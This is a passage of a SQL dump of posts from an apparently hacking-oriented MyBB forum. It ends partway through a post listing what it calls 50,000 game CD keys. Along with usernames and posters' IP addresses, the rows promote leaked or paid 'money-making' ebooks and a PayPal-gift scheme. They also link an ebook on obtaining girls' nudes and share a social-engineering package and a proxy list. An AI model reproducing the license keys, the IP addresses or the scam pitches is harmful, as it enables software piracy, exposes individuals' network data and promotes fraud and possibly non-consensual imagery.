`replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5435', '959', '5405', '9', 'RE: How to make $50+ / Day with AdFoc or Adfly', '0', '82', 'iTzIpod', '1350595297', 'I know the creator of Customhits.net :3 Very nice method. Tried it. Didn\'t work :p Lool', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '47b88ee627227cfe4a7bc04c90dc5ead', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5436', '943', '5283', '74', 'RE: MINECRAFT PREMIUM GIVEAWAY(no surveys)', '0', '82', 'iTzIpod', '1350595327', 'You PMed me already. Thank you for the account. Didn\'t work though.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4fd087ce1058210e4d254bff03781819', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5437', '964', '5433', '19', 'RE: [UPDATED] L33T Hacking Skype Resolver', '0', '62', 'R?????zo?', '1350595342', 'Looks great, thanks for this bro :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '391d660dc3e395af79cad9ce1d5c5e2f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5438', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '257', 'XxTREYZxX', '1350595343', 'not really my grammar and spelling isn\'t to bad :)', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', '6752adc245d7fbda2d69ecb837bfea4b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5439', '965', '0', '61', '?Free Unlimited Battlefield 3 Limited Edition Codes?', '0', '62', 'R?????zo?', '1350595450', 'Title: How to get unlimited battlefield 3 limited edition codes Author: Dr. Brony and Myself Pages: 2 and a bit :P Description: In this Ebook it will show you step by step on how to get unlimited battlefield 3 limited edition codes :P. This method does not involve the following: 1. PPC (Pay per Click) Marketing ex. Google AdSense or AdBrite 2. CPA (Cost per Action) Marketing ex. AdScendMedia or CPALead 3. SCPA (Secondary Cost per Action) Marketing ex. Share!Cash or File!Ice 4. GPT (Get paid To) Marketing ex. PrizeRebel or Rewards1 5. You do not have to build any websites, write any articles, or anything! 6. Keylogging or any type of RATing. Download here: http://www.mediafire.com/view/?jxwzyua9r507va3', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '2d183f14131e77f621e0f42f4e22f53d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5440', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '62', 'R?????zo?', '1350595490', 'Thanks for this, great giveaway :D', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '0467f7c56c5d8db7435cc83b8bf03ee9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5441', '966', '0', '61', '[99$] Lots of money for anything FAST! [LEAKED]', '0', '62', 'R?????zo?', '1350595588', 'Site: http://www.anything-fast.com/ Download: http://www.mediafire.com/file/s3c8jzszc7t6ml7/FastMoney.pdf', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '046d05a3773bb1ddd6f8a2da2bb0c96c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5442', '943', '5436', '74', 'RE: MINECRAFT PREMIUM GIVEAWAY(no surveys)', '0', '257', 'XxTREYZxX', '1350595676', '[quote=\'iTzIpod\' pid=\'5436\' dateline=\'1350595327\'] You PMed me already. Thank you for the account. Didn\'t work though. [/quote] it does try again :O i just tried it and it worked :)', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', '58d161d97bc32b8dbb0fccbc68b40804', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5443', '967', '0', '9', '[Free]Awesome Monetizing, and SEO eBooks Collections [Free]WORTH 1000$', '0', '62', 'R?????zo?', '1350595699', '[b][align=center]Hello Guys I have some Great Monetizing eBooks collection, These all are based on money making and SEO methods. Some books are bought by me and some are public but i can guarantee you , every method is work as fuck . dont belive me Grab your copy and find yourself. Proofs : [img]http://i.imgur.com/qppCe.jpg[/img] [img]http://i.imgur.com/6lZSM.jpg[/img] [img]http://i.imgur.com/1GhYM.jpg[/img] [img]http://i.imgur.com/vAAN9.jpg[/img] Download Link : http://www.mediafire.com/download.php?x9cphq1n8gpma3d [/align][/b]', '94.132.244.168', '1585771688', '1', '0', '62', '1350595710', '1', 'fe53fffc9b75fd9ea1b530276d29dc41', '0', '1350595710'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5444', '968', '0', '61', '[Ebook] [HOT] Get Any Girls Nudes You Want [HOT] [Ebook]', '0', '62', 'R?????zo?', '1350595749', 'Hope you guys like it for all you horny fellas out there! Link: http://www.sendspace.com/file/qjef5c', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '6ccf64090874422efe93f28f6031dc9b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5445', '967', '5443', '9', 'RE: [Free]Awesome Monetizing, and SEO eBooks Collections [Free]WORTH 1000$', '0', '257', 'XxTREYZxX', '1350595797', 'thanks for the share :O appreciated :)', '203.104.11.3', '-882373885', '1', '0', '0', '0', '1', 'ea99689cfb5a3ac458dc466715a5b548', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5446', '952', '5372', '34', 'RE: A nice clean signature tutorial', '0', '2', 'Apathy', '1350595813', '[quote=\'VirtualLegend\' pid=\'5372\' dateline=\'1350573171\'] Nice Tutorial, but did you make it yourself? [/quote] Nope I have credits on the bottom.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '7709f09775f4dde9e7a35b0112112824', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5447', '969', '0', '9', 'UNSATURATED Method - Start Earning Money NOW on 75% AUTOPILOT - $50-100 Per DAY', '0', '62', 'R?????zo?', '1350595842', '[align=center][size=xx-large][color=#FF0000]I\'m About To Show You How I Made Up To $100.00 Per DAY! This Worked While At SCHOOL And WORK! [/color][/size] Update: handing out up to 4 vouch copies to high quality members. Post here if your interested! Have you ever wanted to make money while your busy? Whether you plan on buying a new gaming account, items, or services or even something online? Would you like to start making $50.00 - $100.00 per day on top of school, work, and other extracurricular activities? Are you ready to try a money making eBook which actually works? If you answered true to any of these questions, your in luck. With this method I was able to rake in a whopping $100.00 daily, on top of working a 9-5. I earn a measly $60.00 per day while working, while using this method I increased this to $160.00 per day! For each time I was being paid by my real job I made an extra $1000.00 every two weeks! This guide goes into complete detail (A total of 13 Pages). After reading this, you\'ll have an easy time comprehending just how easy this method is. By following my set by step procedure, you aren\'t going to make a fortune, you probably won\'t start earning a full income, but you CAN make up to $3000.00 per month. If you\'re ready to start making automated money right now, send $10.00 as a gift to skoomesh@hotmail.com and PM me here with your transaction ID for the download link and password What You Need: 1. Up to an hour one day one. 2. Additional time on each additional day, about 30 minutes. 3. A PayPal account This eBook Is Not For: 1. People who think 0 effort will yield results. 2. People who can\'t put in the minuscule effort. 4. People without the ability to use their PCs frequently. If You Want To Buy: 1. Send $10.00 gift to skoomesh@hotmail.com 2. PM me on here with your transaction details. 3. If I do not get back to you within 24 Hours, email me. Some More Info: 1. This will work from anywhere as long as you have a PC with an internet connection. 2. This eBook does not contain PTC, CPA, eBay, PPD, etc. 3. You can start with $0.00 down. 4. You can start earning money today. ToS: Buy purchasing this eBook you, the buyer, agree to the following. All payments will be done from via PayPal. All sales of this eBook are final, including charge backs. After paying you will receive the guide at a maximum of 48 hours after payment has been sent, if you file a dispute before this period of time you will be reported and dealt with accordingly. eBook Price: $10.00 Payment Proof: [img]http://www.pixentral.com/pics/1jt6RlpmM5SoK9nWKPIJMemGJrwV2H.png[/img][/align] [url=https://www.virustotal.com/file/06fe5e4842a6d6d8e50de501bb069bfcf99ea7de78354e064ec8f9eb07c53d5d/analysis/1349002792/]VScan[/url] [url=http://www.mediafire.com/view/?yg4fckbuhy7w9ww][size=large]DOWNLOAD[/size][/url] credits: SNUCK1994', '94.132.244.168', '1585771688', '1', '0', '62', '1350595880', '1', 'f021e14f9ba58640594bf21ca4f62488', '0', '1350595880'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5448', '970', '0', '61', 'Free Premium Ebook Bundle', '0', '62', 'R?????zo?', '1350595970', 'This Ebook bundle comes with 8 unique tuts! This is brought to you for free! All the cost is a thank you below. Thanks! Download Link: http://www.mediafire.com/?cdvp3r69rk5yt', '94.132.244.168', '1585771688', '1', '0', '62', '1350596645', '1', '2420eacdc16ff97d42f78774a9f0e1a8', '0', '1350596645'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5449', '971', '0', '9', 'EASY $250 EACH DAY | \"The Webmaster Method\" | Instant paypal money, no wait', '0', '62', 'R?????zo?', '1350596153', '[ALIGN=CENTER][img]http://i.minus.com/ibnksuPktPo82p.png[/img] Download link: http://www.sendspace.com/file/37ca53[/ALIGN]', '94.132.244.168', '1585771688', '1', '0', '62', '1350597535', '1', 'ce659c43bee565419aff7e5d972638e7', '0', '1350597535'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5450', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '62', 'R?????zo?', '1350596243', 'your welcome, I laugh my ass off too :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c5b26653f9bbf9a3abfda934a9e6985b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5451', '969', '5447', '9', 'RE: UNSATURATED Method - Start Earning Money NOW on 75% AUTOPILOT - $50-100 Per DAY', '0', '228', 'VirtualLegend', '1350596353', 'Awesome Share, Keep it up !!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'ceb0936303b5a2ceeddc6ccb21dc0c51', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5452', '947', '5450', '8', 'RE: GANGNAM STYLE', '0', '257', 'XxTREYZxX', '1350596364', '[quote=\'R?????zo?\' pid=\'5450\' dateline=\'1350596243\'] your welcome, I laugh my ass off too :P [/quote] yeah i bet he is racking up fame everytime he does that dance lol', '203.104.11.6', '-882373882', '1', '0', '0', '0', '1', 'bcd7818581c224889e1a5c51c38927e5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5453', '972', '0', '16', 'Social Engineering Package', '0', '62', 'R?????zo?', '1350596435', 'Here\'s Social Engineering Package I received a while ago. Hope you all find it useful. Download Here: http://www.4shared.com/rar/3ra6LaBK/Defcons_Social_Engineering_Pac.html Preview: [img]http://gyazo.com/4c04ecdc6e66f33f6643ed16c146cbee.png[/img]', '94.132.244.168', '1585771688', '1', '0', '62', '1350596455', '1', '590d3018adf394c80b36b9ff556e0f7c', '0', '1350596455'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5454', '973', '0', '19', '[Junk]New HF Logo?', '0', '214', 'Rave™', '1350596533', 'I think this should be I made it. http://adf.ly/Diq4b', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '2fd93707832aba334de8bbe8483207d3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5455', '974', '0', '61', 'Get Abs Sitting at your Computer in 2 weeks!', '0', '62', 'R?????zo?', '1350596609', 'No idea if this actually works but it\'s a paid ebook. https://dl.dropbox.com/u/70931930/Abs%202%20Weeks%20Updated.pdf', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '12129dfef8ad30d197eb6ca7684a760b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5456', '975', '0', '7', 'how do i insert a pic', '0', '257', 'XxTREYZxX', '1350596627', 'hey i was just wondering how do i post a pic :)', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', '1c75a226e91577a6355cb29110fc6064', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5457', '973', '5454', '19', 'RE: New HF Logo?', '0', '62', 'R?????zo?', '1350596845', 'That\'s disgusting. ewwwww', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '9e89cabffb829bc9e4a4044651247a03', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5458', '975', '5456', '7', 'RE: how do i insert a pic', '0', '62', 'R?????zo?', '1350596919', 'use this [code] [img]pic link goes here[/img] [/code]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'aad62713c57b81973ffc549995254a43', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5459', '976', '0', '71', 'Halo 4', '0', '257', 'XxTREYZxX', '1350596963', 'halo 4 is on its way if you havent checked out the trailer check it out here:www.youtube.com/watch?v=nsWyP0LBikI who\'s going to get it :O', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '5dcd2c4ee6ff14d21a674cc9c1f61e8d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5460', '977', '0', '14', '[FREE] VPN Every 24 Hours [FREE]', '0', '62', 'R?????zo?', '1350596999', 'Hey have you ever wanted your own free premium vpn? Well look at this site: http://incloak.com/premium/demo/ you can get a 24 hour key code to have a vpn! This vpn inculdes many countries as: Russia (Moscow, Sankt-Peterburg, Saratov) USA (California) Canada (Montrea) Germany (Frankfurt, Nurnberg) England (Worcester) Ukraine (Kharkov) Italy (Marco) Sweden (Falkenberg) Vietnam (Ho Chi Minh) Hong Kong (Central) Netherlands (Amsterdam) Poland (Gdansk) Estonia (Tallinn) Hungary (Budapest) Luxembourg (Steinsel) France (Paris) Switzerland (Zurich Austria (Graz Latvia (Riga) Random server ~Alot more~ Works great if your activating out of country steam keys! -How to use- Ok after you got your key and download the folder from here: http://incloak.com/vpn/ open it and you will see 3 different files they match the OS you are running if you are running Windows take out the windows folder and put it on your deckstop. After that download a program called openvpn from [hide]http://swupdate.open...vpn-connect.msi[/hide] after you got that program downloaded install it, once installed open the program\'s folder and find the config folder in openvpn. Once done copy all the files in the folder you got from incloak into your openvpn config folder, like this: [img]http://i40.tinypic.com/be6hq9.jpg[/img]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '1b5a98a38ffac481c6f88af2ae095c16', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5461', '978', '0', '73', 'IOS vs ANDROID', '0', '257', 'XxTREYZxX', '1350597127', 'title says it all im interested whats going to win LOL', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', 'ed644a0ff021eae432e7b054709d6e14', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5462', '979', '0', '14', '4200 Checked HTTP Proxy Servers (L1/L2/L3)', '0', '62', 'R?????zo?', '1350597128', 'Here you go: http://pastebin.com/p13pjTeR', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '0739ef1dd01787b9e59bcc0729545e92', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5463', '975', '5458', '7', 'RE: how do i insert a pic', '0', '257', 'XxTREYZxX', '1350597200', '[quote=\'R?????zo?\' pid=\'5458\' dateline=\'1350596919\'] use this [code] [img]pic link goes here[/img] [/code] [/quote] yeah but it says too many characters to every pic i choose LOL', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '1388d1a9aee37b3ebd5895dbd6d29fa3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5464', '967', '5443', '9', 'RE: [Free]Awesome Monetizing, and SEO eBooks Collections [Free]WORTH 1000$', '0', '228', 'VirtualLegend', '1350597230', 'Already have them, there are a few good methods', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '21b6277c07193507f0ccc595ced7f886', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5465', '971', '5449', '9', 'RE: EASY $250 EACH DAY | \"The Webmaster Method\" | Instant paypal money, no wait', '0', '228', 'VirtualLegend', '1350597296', 'Nice Thread, Tip; Center it in the middle (Looks way more better ;) )', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '0d90ae9272d871f5f212eb008465eb7c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5466', '980', '0', '43', '50,000 CD KEYS OF PC GAMES', '0', '62', 'R?????zo?', '1350597412', 'BIG LIST: [SPOILER]1503 A.D.: A New World ---------------- 5447-7278892-7648258-2126 9750-0553133-8300899-5758 2012-1236143-5723266-5867 3475-0914223-0632734-6745 9385-8677964-7296207-4572 1503 A.D.: Treasures, Monsters and Pirates ---------------- 7TWN-CFQM-T2B3-7F2K-KEPX HGEE-77DC-J86W-F9WG-S8FN V9L4-5L3C-BQKF-J6AJ-JW37 P99R-H5W5-GM62-NETL-URNP PPDM-UNW3-7VRQ-3NWE-RPE2 Age of Mythology ---------------- XDWXF-2JCVG-VTX6T-6KYQ9-QDC4G RD4D4-B94XK-QVWFP-K9PJD-GVRV3 QVW83-4MC67-FDPTH-49PT8-6HGRD P3HM4-WDM27-662XW-9BPTV-CFVMQ HYQRH-FV79R-RHHPW-23G37-BDM76 Age of Mythology: The Titans ---------------- B23B7-JTKPR-4TQT3-HXGD6-HXY96 T2HB2-G4PK6-MQPDR-CTYPQ-64JK6 XG9Q9-TJCWG-MKV2Q-TGBFK-KP8K6 BQBBY-4T8MK-8TP28-GRHJ4-2RP7G JXFTX-YRVX6-YRRYQ-PBTXP-4YKHG Axis and Allies ---------------- 1005-493D-C922-17D3 1201-7333-7458-686D 1705-3453-2570-A0F9 1022-7053-5324-7ACC 1627-4420-0243-523D Battlefield 1942 ---------------- 6349-9020371-9806846-2830 4964-1668346-7637006-2960 6599-4055214-4745454-2456 2203-7294876-7652422-1340 6801-1528034-1442448-3626 Battlefield 1942: Secret Weapons of WWII ---------------- 3QHZ-KBBE-ZPQV-VDS3-U5MA ANXX-ZKF8-5RZG-SWFK-M2UZ SST3-A9PL-G7GN-856A-PMAW QFC4-T7Q6-33EQ-LUHP-96ZP NH2J-AJ5Y-8JJ9-KFGE-QLKK Battlefield 1942:The Road to Rome ---------------- 0777-4826524-6288328-2359 6413-6941923-0559983-3822 1768-8264649-8295359-3044 0741-8677977-4365014-4911 0256-0695274-2401207-5319 Battlefield Vietnam ---------------- HJSJ-ND22-REVP-QH5N-J67W WA77-2BMM-2TLG-CR43-2L5M TPKK-QJ8R-BBVY-4TVM-8XLX MXZZ-WTZ2-YELT-L8QQ-SGZ2 CDF7-2L2D-4QKK-2329-VG9J Big Scale Racing ---------------- A4FL-2BTO-E8WN-2ESU 93GI-44MP-80GI-B4MP 1EGO-E5AI-66SG-23AY D303-CA11-8356-E548 7A84-EB75-7454-4282 Black and White ---------------- 5615-5218520-3198589-3037 9545-4379446-1230565-7092 1334-5330370-2292790-4422 7450-7423821-6747420-6866 4796-5617828-4021917-4194 Black and White: Creature Isle ---------------- 7622-1467955-6016762-0529 2891-6593534-1909669-1431 7310-9173434-7386602-0753 4153-8092897-3409943-5649 9688-6176943-7166216-4217 Breed ---------------- HK7H9-RM4WL-N97NR-TGMXH-RTR3C XXEME-W99GG-W7ERH-39RGT-MW7HE R34RE-KNHLH-HTERG-LMKMH-CG7T9 4C3N4-XTEEG-GE9KE-4CHMG-9R3L7 N3KEN-3KHNN-GCM9R-RL7XN-9CMH9 Call of Duty ---------------- HKPH-WT3S-8XHU-2YHW-46C4 Y2SG-8W4P-4YYU-SXY8-5A89 KUP8-GX2H-K8SY-P2KG-90EF TGYT-UPEK-GKUE-WTTU-F9E3 X42D-8GXD-HXS2-TGX8-1AD0 Call of Duty: United Offensive ---------------- 74B3-JN4N-4WT4-WRHN-64BF BZTZ-UWG7-UNTN-J7RN-BDE5 DUSU-3TSU-GETW-TYHY-7146 81C5-AB2T-8ZQ9-ESSE-46TZ N4XK-7TRU-WRDB-JDUT-C4D4 Catwoman ---------------- 7JEN-FFXT-E9JW-QN99-BJB6 DC4L-ACZF-W9J6-8EVA-7QVK KLHH-EWUM-NL7L-9EFK-55GQ KZ2J-YGTH-BMRK-A53R-NHVH T5NW-7TWB-4F5F-L27D-BD22 Chrome ---------------- 7XBYF-E7BW2-FCAP3-YPIFL 6TLMS-5UVWA-F8333-G2PCR TAPES-7W9GJ-BPE4Z-8IGLW 6JMYB-CTGPT-ESR4X-Z7UMX 2MWZF-C7FWI-6TJK2-PCSLX Command & Conquer Generals ---------------- 8647-5232955-9878125-6046 9870-3450510-3133911-0726 4511-1729151-9897130-2429 5755-2361463-3448299-3710 5773-7726562-6842888-1323 Command & Conquer Generals: Zero Hour ---------------- YNEN-2FQN-JRYA-G3AB-JSX3 47HH-LWW6-F8AG-AQ7V-2GDP 47P7-JEQX-3CLY-7X53-S5K4 TDLU-665P-JYU5-5ASP-R246 XEJ2-L8YD-D7T3-6RCV-2G6V Command & Conquer Red Alert 2 ---------------- 023093-408048-703486-5751 026929-458543-625750-0149 024971-477113-030353-1433 022921-207519-387995-8278 030119-499472-709335-3679 Command & Conquer Red Alert 2:Yuri\'s Revenge ---------------- 046289-119931-094801-3903 047653-310394-811521-8281 049442-251271-777606-6959 051293-740133-308111-8676 046259-657889-882161-5974 Command & Conquer Renegade ---------------- 061991-914060-171113-5190 056629-874691-293836-0722 064016-686792-796977-2716 057225-538796-853287-6511 060596-686641-669815-8850 Command & Conquer Tiberian Sun ---------------- 685618-936422-961962-7039 835452-395171-622239-3092 257044-656814-148128-3482 601662-875090-962214-1926 169044-690442-019375-9514 Comanche 4 ---------------- KGQJ-8M68-7JQW-DUCV-WLC6 3S2D-FLT1-CLS2-RULE-7865 36V8-BLMT-MXWY-EULX-YMSJ Counter Strike ---------------- 9271-77260-7184 6996-03006-9065 5902-51615-6065 3727-25598-3910 8940-76820-2401 Counter Strike:Condition Zero ---------------- 5Z62F-CEKQD-4WCZT-TAWQH-JGLFQ 54RT2-843TJ-79UJC-ZGVC5-AR3R2 5ZN2H-NWHEY-RRM7H-PZAXA-GIFQJ 5Z62E-MTXQZ-Z32IY-NW22l-A3C4Q 5RP2E-EPH3K-BR3LG-KMGTE-FN8PY Delta Force 2 ---------------- 288T-9AJ2-CVXN-BYSS-NNZW 293C-RQQ7-W2X8-DAQR-YSC4 JTUH-LTHD-BCZV-HFBY-SSNN 24XZ-GHAT-H7W7-C2UP-G559 JSZZ-PPPW-T8BC-TV46-5WSS Delta Force: Black Hawk Down ---------------- QZP3-EPZW-SP5N-2XEX-H7JG QTZ3-RHZT-P5TB-LQXH-7JD3 QKMT-LYAB-HIWB-ZMNW-FYPV QMVQ-NF78-GJMG-XU2B-TZ5K 87HJ-AIFM-AMAO-PFCR-SMSQ Delta Force: Black Hawk Down Team Sabre ---------------- AV4E-YVQE-NACM-DD3M-KBW3 ABRR-65QC-S4AQ-S2G7-CKCG ACWY-D9VK-72CJ-5S5A-9MQU A587-HGH6-HZ47-GNBT-HRNA A7YL-R5SH-MY2E-4JPA-ZJB3 Delta Force:Land Warrior ---------------- 